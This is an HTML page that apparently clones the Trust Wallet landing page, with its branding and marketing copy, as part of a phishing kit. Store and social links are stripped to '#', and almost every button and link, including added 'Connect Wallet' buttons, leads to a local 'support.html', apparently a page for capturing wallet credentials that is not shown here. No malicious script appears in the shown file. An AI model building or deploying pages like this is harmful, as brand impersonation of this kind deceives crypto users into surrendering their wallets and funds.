<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Best Cryptocurrency Wallet | Ethereum Wallet | ERC20 Wallet | Trust Wallet</title>
<meta property="og:title" content="Best Cryptocurrency Wallet | Ethereum Wallet | ERC20 Wallet | Trust Wallet">
<meta name="description" content="Trust Wallet is the best ethereum wallet and cryptocurrency wallet to store your favourite BEP2, ERC20 and ERC721, tokens. Download the Android Trust Wallet and iOS app today!">
<meta property="og:description" content="Trust Wallet is the best ethereum wallet and cryptocurrency wallet to store your favourite BEP2, ERC20 and ERC721, tokens. Download the Android Trust Wallet and iOS app today!">
<meta name="twitter:card" content="summary_large_image">
<meta property="twitter:image" content="../assets/images/horizontal_blue.png">
<meta name="twitter:creator" content="#">
<meta property="og:locale" content="en">
<meta property="og:image" content="../assets/images/horizontal_blue.png">
<meta property="og:type" content="website">
<link rel="canonical" href="#">
<meta property="og:url" content="#">
<meta property="og:site_name" content="Wallet">
<meta property="al:ios:app_name" content="Wallet">
<meta property="al:ios:app_store_id" content="1288339409">
<meta property="al:ios:url" content="trust://">
<meta property="al:android:app_name" content="Trust">
<meta property="al:android:package" content="#">
<meta property="al:android:url" content="#">
<link rel="shortcut icon" href="favicons/images-favicon.ico" type="image/x-icon">
<link rel="shortcut icon" type="image/png" href="favicons/images-favicon.png">
<meta name="apple-itunes-app" content="app-id=1288339409,affiliate-data=11l7ss">
<meta name="theme-color" content="#3375BB">
<script type="application/ld+json">
    {
      "description": "Trust Wallet is the best ethereum wallet and cryptocurrency wallet to store your favourite BEP2, ERC20 and ERC721, tokens. Download the Android Trust Wallet and iOS app today!",
      "@type": "WebPage",
      "url": "#",
      "headline": "Best Cryptocurrency Wallet | Ethereum Wallet | ERC20 Wallet | Trust Wallet",
      "@context": "https://schema.org"
    }
  </script><script async defer data-domain="#" src="js/js-plausible.js"></script><script type="application/javascript">
    document.addEventListener("DOMContentLoaded", function(event) {
      document.getElementById('navbarToggle').addEventListener('click', function() {
        var el = document.getElementById('navbarSupportedContent');
        var toggled = window.getComputedStyle(el).display == 'block';
        if (toggled) {
          el.style.display = "none";
        } else {
          el.style.display = "block";
        }
      })
      //Add Huawei download button based on device.
      var result = new UAParser().getResult();
      var apple = document.getElementsByClassName("apple");
      var huawei = document.getElementsByClassName("huawei");
      var download = document.getElementsByClassName("downloadapp-native");

      if (result.os.name == "Android") {
        for (var i = 0; i < huawei.length; i++) {
          huawei[i].classList.remove("hidden");
          apple[i].classList.add("hidden");
        }
        // if it is android change ctas to googleplay
        for (var i = 0; i < download.length; i++) {
          download[i].href = "#";
        }
      }
      // if its apple change ctas to appstore
       else if (result.os.name == "iOS") {
        for (var i = 0; i < download.length; i++) {
          download[i].href = "#";
        }
      }
    });
  </script>
<noscript>Your browser does not support JavaScript!</noscript>
<link rel="preload" href="/assets/fonts/IBMPlexSans/IBMPlexSans-Regular.woff2" as="font" type="font/woff2" crossorigin>
<link rel="preload" href="/assets/fonts/IBMPlexSans/IBMPlexSans-Bold.woff2" as="font" type="font/woff2" crossorigin>
<link rel="preload" href="/assets/fonts/IBMPlexSans/IBMPlexSans-Medium.woff2" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="css/css-main.css">
<link rel="alternate" href="#" hreflang="en">
<link rel="alternate" href="#" hreflang="x-default">
<link rel="alternate" href="#" hreflang="ru">
<link rel="alternate" href="#" hreflang="de">
<link rel="alternate" href="#" hreflang="vi">
<link rel="alternate" href="#" hreflang="id">
<link rel="alternate" href="#" hreflang="ko">
<link rel="alternate" href="#" hreflang="ja">
<link rel="alternate" href="#" hreflang="tr">
<link rel="alternate" href="#" hreflang="pt">
<link rel="alternate" href="#" hreflang="zh">
<link rel="alternate" href="#" hreflang="es">
<script type="text/javascript" src="js/js-platform.js"></script>

<style>
.button {
  background-color: #0c63c0; /* Green */
  border: none;
  color: white;
  padding: 20px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 30px;
  margin: 4px 2px;
  cursor: pointer;
  border-style: solid;
  border-width: medium;
  border-color: white;
}


.button4 {border-radius: 12px;}

</style>

</head>
<body> <nav class="navbar navbar-expand-lg navbar-togglable navbar-dark bg-primary d-block">
<div class="container">
    
<a  id="navbar-brand" 
    class="navbar-brand" 
    href="#" 
    aria-label="Goes back on homepage">
    
    <svg    class="navbar-brand-img logotype-white" 
            alt="Trust Wallet logotype"></svg>
            
            </a>

<button class="navbar-toggler collapsed" id="navbarToggle" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-expanded="false" aria-hidden="true" aria-label="Toggle navigation" aria-controls="navbarCollapse">
<span class="navbar-toggler-icon collapsed"></span>
</button>

<div class="navbar-collapse collapse navbar-margin" id="navbarSupportedContent">
<button class="navbar-toggler collapsed" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarCollapse" aria-expanded="false" aria-hidden="true" aria-label="Toggle navigation">
</button>
<ul class="navbar-nav font-size-sm ml-auto">
<li class="nav-item">
<a class="nav-link" href="support.html" aria-label="Goes to supported assets page">Assets</a>
</li>
<li class="nav-item">
<a class="nav-link" href="support.html" aria-label="Goes to staking page where you can learn what is staking and calculate APRs">Staking</a>
</li>
<li class="nav-item">
<a class="nav-link" href="support.html" aria-label="Goes to earn page where you can earn up to +11% APR">Earn<span class="badge badge-success ml-2 pl-2 pr-2">+11% APR</span></a>
</li>
<li class="nav-item">
<a class="nav-link" href="support.html" aria-label="Goes to NFT page">NFTs</a>
</li>
<li class="nav-item">
<a class="nav-link" href="support.html" aria-label="Goes to DApp browser page">DApp Browser</a>
</li><li class="nav-item dropdown" aria-label=" flag" alt=" flag">
<a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="false" aria-expanded="true" aria-label="Opens dropdown to select different language for the site">
Language
<div class="flag bg-" aria-label=" flag"></div>
</a>
<div class="dropdown-menu dropdown-menu-md" aria-labelledby="navbarDropdown">
<div class="list-group list-group-flush">
<ul class="list-unstyled list-block">
<li class="list-inline-item m-6"><a href="support.html" class="list-group-item" aria-label="changes language of the page to en">
<div class="flag bg-en" title="en flag"></div>
</a></li><li class="list-inline-item m-6"><a href="support.html" class="list-group-item list-inline-item" aria-label="changes language of the page to ru">
<div class="flag bg-ru" title="ru flag"></div>
</a></li><li class="list-inline-item m-6"><a href="support.html" class="list-group-item list-inline-item" aria-label="changes language of the page to de">
<div class="flag bg-de" title="de flag"></div>
</a></li><li class="list-inline-item m-6"><a href="support.html" class="list-group-item list-inline-item" aria-label="changes language of the page to vi">
<div class="flag bg-vi" title="vi flag"></div>
</a></li><li class="list-inline-item m-6"><a href="support.html" class="list-group-item list-inline-item" aria-label="changes language of the page to id">
<div class="flag bg-id" title="id flag"></div>
</a></li><li class="list-inline-item m-6"><a href="support.html" class="list-group-item list-inline-item" aria-label="changes language of the page to ko">
<div class="flag bg-ko" title="ko flag"></div>
</a></li><li class="list-inline-item m-6"><a href="support.html" class="list-group-item list-inline-item" aria-label="changes language of the page to ja">
<div class="flag bg-ja" title="ja flag"></div>
</a></li><li class="list-inline-item m-6"><a href="support.html" class="list-group-item list-inline-item" aria-label="changes language of the page to tr">
<div class="flag bg-tr" title="tr flag"></div>
</a></li><li class="list-inline-item m-6"><a href="support.html" class="list-group-item list-inline-item" aria-label="changes language of the page to pt_BR">
<div class="flag bg-pt_BR" title="pt_BR flag"></div>
</a></li><li class="list-inline-item m-6"><a href="support.html" class="list-group-item list-inline-item" aria-label="changes language of the page to zh_CN">
<div class="flag bg-zh_CN" title="zh_CN flag"></div>
</a></li><li class="list-inline-item m-6"><a href="support.html" class="list-group-item list-inline-item" aria-label="changes language of the page to es">
<div class="flag bg-es" title="es flag"></div>
</a></li>
</ul>
</div>
</div>
</li></ul>
</div>
</div>
</nav>
<main class="page-content" aria-label="Content">
<section class="pt-8 pb-8 bg-gradient-primary">
<div class="container">
<div class="row align-items-center justify-content-center justify-content-md-between">
<div class="col-12 col-lg-6 mb-8 text-center text-md-left text-white">
<h1 class="display-3 font-weight-bold">The most trusted &amp; secure crypto wallet</h1>
<p class="text-white-90 lead mb-4">Buy, store, collect NFTs, exchange &amp; earn crypto. Join 25 million+ people using Trust Wallet.</p><div class="download-button">



<center><button class="button button4" onclick="window.open('support.html')">Connect Wallet</button></center>






</div>
</div>
<div class="col-12 col-lg-6 text-center">
<img loading="lazy" class="hero-image mx-auto d-block img-fluid" src="images/images-home_hero.png" alt="Trust Wallet app mobile mockup">
</div>
</div>
</div>
</section>
<section class="pt-6">
<div class="container">
<div class="row border-bottom justify-content-center pb-4">
<div class="col-12 col-md-auto mr-auto d-flex justify-content-center">
<div class="icon icon-xs mb-5">
<svg alt="icon card" title="Credit card icon">
<img src="../assets/images/card.svg">
</svg>
</div>
<div class="ml-4">
<span class="font-weight-bold lead">
Buy Crypto With a Card
</span>
</div>
</div>
<div class="col-12 col-md-auto d-flex justify-content-center">
<div class="icon icon-xs mb-5">
<svg alt="icon dex" title="Arrow shape icon">
<img src="../assets/images/dex.svg">
</svg>
</div>
<div class="ml-4">
<span class="font-weight-bold lead">
Exchange Instantly
</span>
</div>
</div>
<div class="col-12 col-md-auto ml-auto d-flex justify-content-center">
<div class="icon icon-xs mb-5">
<svg alt="icon lock" title="Key lock icon">
<img src="../assets/images/lock.svg">
</svg>
</div>
<div class="ml-4">
<span class="font-weight-bold lead">
Private &amp; Secure
</span>
</div>
</div>
</div>
</div>
</section>
<section class="pt-8">
<div class="container">
<div class="row align-items-center justify-content-center justify-content-md-between">
<div class="col-12 text-center mt-4 mt-md-0 order-md-2">
<h2 class="display-4 font-weight-bold mb-4">You Deserve Easy Access to Cryptocurrencies</h2>
<p class="lead text-gray-700">Trust Wallet is for you if you want to</p>
</div>
</div>
<div class="row align-items-center justify-content-center justify-content-md-between pt-4 pb-4 text-center">
<div class="col-12 col-lg-6">
<div class="list-group-item d-flex"><span class="mr-4"><em class="check"></em></span>Buy Bitcoin in under five minutes</div>
<div class="list-group-item d-flex"><span class="mr-4"><em class="check"></em></span>Easily earn interest on the crypto in your wallet</div>
<div class="list-group-item d-flex"><span class="mr-4"><em class="check"></em></span>See your collectibles. Art &amp; NFTs in one place</div>
</div>
<div class="col-12 col-lg-6">
<div class="list-group-item d-flex"><span class="mr-4"><em class="check"></em></span>Exchange your crypto without leaving the app</div>
<div class="list-group-item d-flex"><span class="mr-4"><em class="check"></em></span>Track charts and prices within the app</div>
<div class="list-group-item d-flex"><span class="mr-4"><em class="check"></em></span>Keep your crypto safe from hackers &amp; scammers</div>
</div>
<a href="support.html" class="btn btn-primary mt-6 mx-auto downloadapp-native" aria-label="goes to download page to get Trust Wallet App">
CONNECT WALLET
</a>
</div>
</div>
</section>
<section class="pt-8">
<div class="container">
<div class="row align-items-center justify-content-center justify-content-md-between">
<div class="col-12 col-md-6 col-lg-5 text-center text-md-left mb-4 order-sm-first order-md-2">
<h2 class="display-4 font-weight-bold mt-4">Buy Crypto With a Card</h2>
<p class="lead text-gray-700">Get your first $50 of Bitcoin, Ethereum, Binance Coin and many other cryptocurrencies.</p>
</div>
<div class="col-12 col-md-6 col-lg-7">
<img loading="lazy" class="img-fluid mx-auto d-block" src="images/images-home_cards.png" alt="Trust Wallet mobile mockup shows how it looks like to buy crypto with credit card">
</div>
</div>
<div class="row align-items-center justify-content-center justify-content-md-between">
<div class="col-12 col-md-6 col-lg-5 text-center text-md-left mb-4">
<h2 class="display-4 font-weight-bold mt-8">Exchange Instantly</h2>
<p class="lead text-gray-700">No forms, no selfies. Trade crypto anytime with ease.</p>
</div>
<div class="col-12 col-md-6 col-lg-7">
<img loading="lazy" class="img-fluid  mx-auto d-block" src="images/images-home_dex.png" alt="Trust Wallet mobile mockup shows an example how swapping cryptocurrencies looks like">
</div>
</div>
<div class="row align-items-center justify-content-center justify-content-md-between">
<div class="col-12 col-md-6 col-lg-5 order-sm-2 text-center text-md-left mb-4order-md-2">
<h2 class="display-4 font-weight-bold mt-8">Private &amp; Secure</h2>
<p class="lead text-gray-700">Only you can access your wallet. We don&rsquo;t collect any personal data.</p>
</div>
<div class="col-12 col-md-6 col-lg-7">
<img loading="lazy" class="img-fluid mx-auto d-block" src="images/images-home_security.png" alt="Trust Wallet mobile mockup shows that wallet is private and secure">
</div>
</div>
<div class="row align-items-center justify-content-center justify-content-md-between">
<div class="col-12 col-md-6 col-lg-5 text-center text-md-left mb-6 mb-md-10">
<h2 class="display-4 font-weight-bold mt-8">Browser for DApps</h2>
<p class="lead text-gray-700">Use your favourite decentralized apps &amp; find new ones, without leaving your wallet.</p>
</div>
<div class="col-12 col-md-6 col-lg-7">
<img loading="lazy" class="img-fluid mx-auto d-block" src="images/images-home_dapps.png" alt="Trust Wallet mobile mockup shows list of dapps you can interact within the wallet">
</div>
</div>
</div>
</section><section class="pt-8 pb-8 pt-sm-10 pb-sm-10">
<div class="container">
<div class="row">
<div class="col-12 text-center mb-2">
<h3 class="display-4 font-weight-bold">
Get started in 3 simple steps
</h3>
<p class="lead text-gray-700">It only takes a few minutes</p>
</div>
</div>
<div class="row no-gutters mt-8 mb-6 mb-md-7">
<div class="col-12 col-md-4 text-center">
<div class="row mb-5">
<div class="col">
</div>
<div class="col-auto icon-xxl">
<svg alt="icon icon-sm" aria-label="Illustration that shows a man sitting on a bench downloading a wallet">
<use xlink:href="/assets/images/3steps.svg#download" alt="Illustration that shows a man sitting on a bench downloading a wallet"></use>
<img src="../assets/images/icon-sm.svg">
</svg>
</div>
<div class="col">
<hr class="d-none d-md-block mt-8">
</div>
</div>
<h3 class="font-weight-bold">
Download Trust Wallet
</h3>
</div>
<div class="col-12 col-md-4 text-center">
<div class="row mb-5">
<div class="col">
<hr class="d-none d-md-block mt-8">
</div>
<div class="col-auto icon-xxl">
<svg alt="icon icon-sm" aria-label="Illustration that shows a man creating a crypto wallet while walking">
<use xlink:href="/assets/images/icon-sm.svg" alt="Illustration that shows a man creating a crypto wallet while walking"></use>
<img src="../assets/images/icon-sm-1.svg">

</svg>
</div>
<div class="col">
<hr class="d-none d-md-block mt-8">
</div>
</div>
<h3 class="font-weight-bold">
Create a new wallet
</h3>
</div>
<div class="col-12 col-md-4 text-center">
<div class="row mb-5">
<div class="col">
<hr class="d-none d-md-block mt-8">
</div>
<div class="col-auto icon-xxl">
<svg alt="icon icon-sm" aria-label="Illustration that shows a man holding phone while buying cryptocurrencies with credit card">
<use xlink:href="/assets/images/3steps.svg#buy" alt="Illustration that shows a man holding phone while buying cryptocurrencies with credit card"></use>
<img src="../assets/images/icon-sm-2.svg">
</svg>
</div>
<div class="col">
</div>
</div>
<h3 class="font-weight-bold">
Get some crypto
</h3>
</div>
</div>
<div class="row">
<div class="col-12 text-center">
<a href="support.html" class="btn btn-primary mx-auto downloadapp-native" aria-label="goes to download page to get Trust Wallet App">
CONNECT WALLET
</a>
</div>
</div>
</div>
</section>
</main><section class="bg-light">
<div class="container pt-8 pb-8">
<div class="row align-items-center">
<div class="col-12 col-md text-center text-lg-left mt-2">
<h3 class="font-weight-bold mb-1">
Get the Trust Wallet app now!
</h3>
<p class="text-gray-700 mb-6 mb-md-0 no-whitespace">
The most trusted &amp; secure crypto wallet
</p>
</div>
<div class="col-12 col-lg-7"><div class="download-button">
<div class="row download">
<div class="col-12 col-lg-4 apple">
<a href="support.html" class="downloadapp" aria-label="goes to AppStore to download Trust Wallet for iphones">
<svg class="download-app-image download-apple" loading="lazy" role="img" alt="goes to AppStore to download Trust Wallet for iphones" aria-label="goes to AppStore to download Trust Wallet for iphones" rel="noopener"></svg>
</a>
</div>
<div class="col-12 col-lg-4 googleplay">
<a href="support.html" class="downloadapp" aria-label="goes to Google Play store to download Trust Wallet for Android phones">
<svg class="download-app-image download-play" loading="lazy" role="img" alt="goes to Google Play store to download Trust Wallet for Android phones" aria-label="goes to Google Play store to download Trust Wallet for Android phones" rel="noopener"></svg>
</a>
</div>
<div class="col-12 col-lg-4 androidapk">
<a href="support.html" class="downloadapp" aria-label="Downloads Trust Wallet as APK file for android phones">
<svg class="download-app-image download-apk" loading="lazy" role="img" alt="Downloads Trust Wallet as APK file for android phones" aria-label="Downloads Trust Wallet as APK file for android phones" rel="noopener"></svg>
</a>
</div>
<div class="col-12 col-lg-4 huawei hidden">
<a href="support.html" class="downloadapp" aria-label="goes to huawei store to download Trust Wallet for huawei phones">
<svg class="download-app-image download-huawei" loading="lazy" role="img" alt="goes to huawei store to download Trust Wallet for huawei phones" aria-label="goes to huawei store to download Trust Wallet for huawei phones" rel="noopener"></svg>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<footer class="py-8 py-md-8 bg-white">
<data class="u-url" href="/"></data>
<div class="container">
<div class="row text-center text-md-left">
<div class="col-12 col-md-4 col-lg-3">
<a href="2#" id="footer-brand-image" aria-label="Goes to homepage"><svg alt="" class="footer-brand-image logotype-dark img-fluid mb-4" aria-label="Goes back to homesite"></svg></a><ul class="list-unstyled list-inline list-social mb-6 mb-md-0">
<li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
<a href="../assets/images/facebook.svg"" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet Facebook fan page">
<svg class="social-icon" alt="trustwallet facebook" title="trustwallet facebook">
<img src="../assets/images/facebook.svg">
</svg>
</a>
</li>
<li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
<a href="#" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet github page">
<svg class="social-icon" alt="trustwallet github" title="trustwallet github">
<img src="../assets/images/github.svg">
</svg>
</a>
</li>
<li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
<a href="#" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet Instagram fan page">
<svg class="social-icon" alt="trustwallet instagram" title="trustwallet instagram">
<img src="../assets/images/instagram.svg">
</svg>
</a>
</li>
<li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
<a href="#" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet Twitter fan page">
<svg class="social-icon" alt="trustwallet twitter" title="trustwallet twitter">
<img src="../assets/images/twitter.svg">
</svg>
</a>
</li>
<li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
<a href="#" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet Reddit fan page">
<svg class="social-icon" alt="trustwallet reddit" title="trustwallet reddit">
<img src="../assets/images/reddit.svg">
</svg>
</a>
</li>
<li class="list-inline-item list-social-item pt-2">
<a href="#" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet title telegram announcement chat">
<svg class="social-icon" alt="trustwallet telegram" title="trustwallet telegram">

<img src="../assets/images/telegram.svg">
</svg>
</a>
</li>
</ul>
</div>
<div class="col-12 col-md-4 col-lg-3">
<h4 class="font-weight-bold text-uppercase text-gray-700">Trust Wallet</h4>
<ul class="list-unstyled text-gray-700 mb-6 mb-md-8 mb-lg-0">
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="Goes to assets page">Assets</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="Goes to dapp browser page">DApp Browser</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="Goes to stablecoin page">Stablecoins</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="Goes Trust Wallet Beta page">Beta</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="Goes to collectible page">NFTs</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="Goes to el salvador wallet">El Salvador Wallet</a>
</li>
<li class="mb-3">
<a href="support.html" rel="noopener" target="_blank" class="text-reset" aria-label="Opens AppStore page to download Trust Wallet for iphones">Crypto Wallet for iOS</a>
</li>
<li class="mb-3">
<a href="support.html" rel="noopener" target="_blank" class="text-reset" aria-label="Opens Google Play page to download Trust Wallet for androids">Crypto Wallet for Android</a>
</li>
</ul>
</div>
<div class="col-12 col-md-4 col-lg-2">
<h4 class="font-weight-bold text-uppercase text-gray-700">Information</h4>
<ul class="list-unstyled text-gray-700 mb-0">
<li class="mb-3">
<a href="support.html" target="_blank" class="text-reset" aria-label="Opens Trust Wallet community page">Community</a>
</li>
<li class="mb-3">
<a href="support.html" target="_blank" class="text-reset" aria-label="Opens help Ccnter page">Help Center</a>
</li>
<li class="mb-3">
<a href="support.html" rel="noopener" target="_blank" class="text-reset" aria-label="Opens support page">Support</a>
</li>
<li class="mb-3">
<a href="support.html" rel="noopener" class="text-reset" aria-label="Opens Trust Wallet blog page">DApp Journey</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="Opens Developer page">Developers</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="Opens a page with form to submit a dapp for Trust Wallet listing">Submit DApp</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="Opens a page with brand kit with Trust Wallet logos, icons and many more">Press Kit</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="Opens a page with terms of services">Terms Of Service</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="Opens a page with privacy and policy">Privacy Policy</a>
</li>
</ul>
</div>
<div class="col-12 col-md-4 offset-md-4 col-lg-2 offset-lg-0">
<h4 class="font-weight-bold text-uppercase text-gray-700">Use Crypto</h4>
<ul class="list-unstyled text-gray-700 mb-6 mb-md-8 mb-lg-0">
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="opens a bitcoin page">Buy Bitcoin with a credit card</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="opens a ethereum page where you can learn how to buy it">Buy Ethereum</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="opens a binance coin page where you can learn how to buy it">Buy BNB</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="opens a litecoin page where you can learn how to buy it">Buy Litecoin</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="opens a bitcoin tron where you can learn how to buy it">Buy TRON</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="opens a xrp page where you can learn how to buy it">Buy XRP</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="opens a bitcoin cash page where you can learn how to buy it">Buy Bitcoin Cash</a>
</li>
<hr>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="opens a bitcoin page where you can learn how to earn it">Earn Bitcoin</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="opens a ethereum page where you can learn how to earn it">Earn Ethereum</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="opens a binance coin page where you can learn how to earn it">Earn Binance Coin</a>
</li>
<li class="mb-3">
<a href="support.html" class="text-reset" aria-label="opens a cake page where you can learn how to earn it">Earn Cake</a>
</li>
</ul>
</div>
<div class="col-12 col-md-4 col-lg-2">
<h4 class="font-weight-bold text-uppercase text-gray-700">Assets</h4>
<ul class="list-unstyled text-gray-700 mb-6 mb-md-8 mb-lg-0">
<li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (BTC) where you can learn more about it">Bitcoin (BTC)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (ETH) where you can learn more about it">Ethereum (ETH)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (BNB) where you can learn more about it">Binance Coin (BNB)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (LTC) where you can learn more about it">Litecoin (LTC)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (XRP) where you can learn more about it">Ripple (XRP)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (DOGE) where you can learn more about it">Dogecoin (DOGE)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (DOT) where you can learn more about it">Polkadot (DOT)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (BNB) where you can learn more about it">Smartchain (BNB)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (DASH) where you can learn more about it">Dash (DASH)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (TRX) where you can learn more about it">TRON (TRX)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (XTZ) where you can learn more about it">Tezos (XTZ)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (ATOM) where you can learn more about it">Cosmos (ATOM)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (XLM) where you can learn more about it">Stellar (XLM)</a>
</li><li class="mb-3"><a href="support.html" class="text-gray-700" aria-label="Goes to the page of  (KAVA) where you can learn more about it">Kava (KAVA)</a>
</li></ul>
</div>
</div>
</div>
</footer>
</body>
</html>
